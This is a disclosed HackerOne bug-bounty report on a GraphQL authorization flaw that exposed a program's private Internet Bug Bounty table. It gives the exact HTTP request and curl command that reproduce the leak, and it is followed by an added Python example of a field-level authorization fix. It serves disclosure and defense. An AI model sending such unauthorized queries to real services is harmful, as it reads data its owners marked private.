hackerone / Akashhamal0x01 / H1:2322082
History: Jan 16, 2024 - 1:34 p.m.

HackerOne: Being able to disclose IBB bounty table of any public program

2024-01-16 13:34:59
akashhamal0x01
hackerone.com
9
hackerone
ibb bounty table
unauthorized access
private information disclosure
bugbounty

AI Score

6.9

Confidence

Low

Summary:

Hi there, I hope you are doing well :)

According to https://docs.hackerone.com/en/articles/8496298-internet-bug-bounty

██████

It says “You can opt-in by setting up your bounty table on your main program’s rewards settings page (instructions below). This bounty table is private and indicates how much you will award for vulnerabilities discovered in open-source projects”

Which means the IBB bounty table is private, but I was able to disclose the IBB bounty table.

Steps To Reproduce

  1. Send this HTTP request:


POST /graphql HTTP/2
Host: hackerone.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: application/json
Content-Type: application/json
Content-Length: 157
Te: trailers

{"query":"{\r\n  team(handle: \"security\") {\r\n\r\nibb_bounty_table {\r\n      critical\r\n      high\r\n      medium\r\n      low\r\n    }\r\n}\r\n}\r\n"}

Or

run this curl command:


curl -i -s -k -X $'POST' \
    -H $'Host: hackerone.com' -H $'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0' -H $'Accept: application/json' -H $'Content-Type: application/json' -H $'Content-Length: 157' -H $'Te: trailers' \
    --data-binary $'{\"query\":\"{\\r\\n  team(handle: \\\"security\\\") {\\r\\n\\r\\nibb_bounty_table {\\r\\n      critical\\r\\n      high\\r\\n      medium\\r\\n      low\\r\\n    }\\r\\n}\\r\\n}\\r\\n\"}' \
    $'https://hackerone.com/graphql'

It will disclose the IBB bounty table of HackerOne:

█████

Impact

Private information disclosure
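The root cause described in this report is a GraphQL field that the documentation calls private but that the API resolves for any caller. The following is an added illustration of the defender-side fix, not HackerOne's code: a minimal resolver model in which authorization is enforced at the field (`ibb_bounty_table`) rather than assumed to be handled elsewhere. The team handles, viewer names, membership policy and bounty amounts are constructed for the example.

```python
"""Field-level authorization for a GraphQL-style resolver (added example).

Models the failure mode in the report above (a private field returned to every
caller) next to the hardened resolver. All teams, viewers and amounts below are
constructed sample data, and the "members of the team may read private fields"
policy is an assumption made for the example.
"""
from dataclasses import dataclass, field
from typing import Callable, Dict, List, Optional


@dataclass
class Viewer:
    username: Optional[str]                 # None models an unauthenticated caller
    team_memberships: frozenset = frozenset()


@dataclass
class Team:
    handle: str
    name: str                               # public field
    ibb_bounty_table: dict = field(default_factory=dict)   # private field


# Constructed in-memory "database" for the example.
TEAMS: Dict[str, Team] = {
    "example-team": Team(
        handle="example-team",
        name="Example Team",
        ibb_bounty_table={"critical": 5000, "high": 2500, "medium": 1000, "low": 250},
    ),
}


def resolve_ibb_bounty_table_vulnerable(team: Team, viewer: Viewer) -> dict:
    """The failure mode: the resolver assumes 'private' is enforced somewhere
    upstream and returns the field to whoever asks for it."""
    return team.ibb_bounty_table


def viewer_can_read_private_fields(team: Team, viewer: Viewer) -> bool:
    """Assumed policy: only authenticated members of the team may read its
    private fields."""
    return viewer.username is not None and team.handle in viewer.team_memberships


def resolve_ibb_bounty_table(team: Team, viewer: Viewer) -> Optional[dict]:
    """Hardened resolver: the check lives on the field itself, so a nested
    selection inside a public query (team(handle: ...) { ... }) cannot skip it."""
    if not viewer_can_read_private_fields(team, viewer):
        # GraphQL null for unauthorized viewers; this does not reveal whether
        # the team has configured a table at all.
        return None
    return dict(team.ibb_bounty_table)


def execute_team_query(handle: str, selections: List[str], viewer: Viewer) -> Optional[dict]:
    """Minimal stand-in for a GraphQL executor: resolves the requested
    selections on team(handle: ...) with per-field authorization."""
    team = TEAMS.get(handle)
    if team is None:
        return None
    field_resolvers: Dict[str, Callable[[Team, Viewer], object]] = {
        "handle": lambda t, v: t.handle,
        "name": lambda t, v: t.name,
        "ibb_bounty_table": resolve_ibb_bounty_table,
    }
    result = {}
    for selection in selections:
        resolver = field_resolvers.get(selection)
        if resolver is None:
            raise ValueError(f"unknown field: {selection}")
        result[selection] = resolver(team, viewer)
    return result


if __name__ == "__main__":
    anonymous = Viewer(username=None)
    member = Viewer(username="alice", team_memberships=frozenset({"example-team"}))
    print(execute_team_query("example-team", ["name", "ibb_bounty_table"], anonymous))
    print(execute_team_query("example-team", ["name", "ibb_bounty_table"], member))
```

The point of putting the check in the field resolver is that GraphQL lets a caller reach nested fields from any public entry point; a check only on the top-level `team` query, or only in the web UI, leaves the field reachable exactly as the request in the report shows.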
